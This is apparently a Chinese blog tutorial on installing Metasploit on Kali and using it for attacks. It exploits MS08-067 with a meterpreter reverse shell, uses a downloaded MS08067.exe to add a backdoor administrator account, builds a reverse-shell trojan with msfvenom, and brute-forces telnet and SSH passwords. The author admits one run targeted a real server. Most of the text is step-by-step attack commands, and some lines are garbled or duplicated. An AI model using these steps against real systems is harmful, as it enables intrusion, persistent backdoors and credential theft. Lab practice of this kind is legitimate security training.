64.Linux metasploit安装及使用
渗透测试框架Metasploit功能众多,它可以帮助用户识别安全问题,验证漏洞的缓解措施,并对某些软件进行安全性评估,提供真正的安全风险情报。
一、安装metasploit
在kali系统使用metasploit时,启动发生故障,所以将其卸载重装
apt-get remove metasploit-framework
apt-get install metasploit-framework
重装失败,显示找不到需要的软件,更换source源后重新安装。
vim /etc/apt/sources.list
添加这两行
deb http://http.kali.org/kali kali-rolling main contrib non-free
deb-src http://http.kali.org/kali kali-rolling main contrib non-free
apt-get update
apt-get install metasploit-framework
安装成功。
启动:
成功启动
二、metasploit利用系统漏洞进行攻击
msfconsole
>show
>use exploit/windows/smb/ms08_067_netapi
>show options
>set RHOST 192.168.252.131 //RHOST是目标地址
>set PAYLOAD windows/meterpreter/reverse_tcp
>set LHOST 192.168.252.136
>exploit //或run,用来执行,本例执行肯定不成功,因为ms08_067是windows漏洞,我131上装的是centos。只是用来演示一下过程
image.png
image.png
image.png
image.png
image.png
ps:windows MS08067漏洞介绍
MS08067远程溢出漏洞是由于windows系统中RPC存在缺陷造成的,windows系统的server服务在处理特别RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,如果受影响的系统收到了特制伪造的RPC请求,可能允许远程执行代码,导致完全入侵用户系统,以SYSTEM权限执行任意指令并获取数据,并获取对该系统的控制权,造成系统失窃及系统崩溃等严重问题。
1.工具——MS08067.exe 攻击命令MS08067.exe 192.168.1.3,向远程主机发送一串特殊构造的数据包,使目标主机产生内存溢出,程序跳转到shellcode代码处执行,shellcode代码在目标主机上开启4444端口,等待连接;
工具下载:https://pan.baidu.com/s/1WD6GOT_gTBm6Ahyk45jmRg
提取码:6cfu
也可以使用像上面一样使用metasploit进行攻击测试。
2.连接远程主机并添加用户 telnet 192.168.1.3 4444
成功连接目标主机,输入命令ipconfig
添加用户 net user aaa 123456 /add
把用户aaa添加到管理员组 net localgroup administrators aaa /add
确认aaa是否在管理员组 net user aaa
3.用户aaa远程连接目标主机 开始——运行——mstsc ,输入ip、账号、密码
三、使用metasploit自己制作木马,并利用起来
1.根据自己的ip生成一个木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.252.136 lPORT=55555 X >test.ext
2.将制作好的test.exe文件发送到靶机上(需要windows xp或03系统)
3.使用
use exploit/multi/handler //使用handle模块
set PAYLOAD windows/meterpreter/reverse_tcp //使用这个shellcode
set LHOST 192.168.252.136
set LPORT 55555
exploit //打开后,在靶机上双击test.exe,监测
四、使用metasploit扫描弱口令
use auxiliary/scanner/telnet/telnet_login //使用telnet爆破模块
set user_file user.txt //设置用户名字典
set pass_file user.txt //设置密码字典
set rhosts IP //我这里用的是真实的服务器地址,所以马掉了
run
尝试爆破telnet弱口令
1543310508(1).jpg
五、使用metasploit爆破ssh弱口令
本机ip:192.168.252.136
靶机ip:192.168.252.128
事先编辑好账号字典user.txt和密码字典password.txt
故意在靶机上设置弱口令root:ll123456和dazhutizi:123.
尝试爆破
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set user_file user.txt
user_file => user.txt
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set user_file user.txt
user_file => user.txt
msf auxiliary(scanner/ssh/ssh_login) > show options
msf auxiliary(scanner/ssh/ssh_login) > run
爆出root账号
但是普通用户dazhutizi的密码却没有爆出来,仔细查看结果,发现原来我之前在128上做了设置,使远程登录输错三次密码后将用户进行锁定==
image.png
按照我编辑的账号和密码本,root刚好尝试了三次就登录成功了,而其他普通用户都被锁定了==(锁定方法:https://www.jianshu.com/p/8c69cc00bbff)
普通用户被锁定
将其解锁,再尝试成功
参考:http://www.freebuf.com/sectool/67685.html
metasploit使用命令参考:https://www.cnblogs.com/lsgxeva/p/8450277.html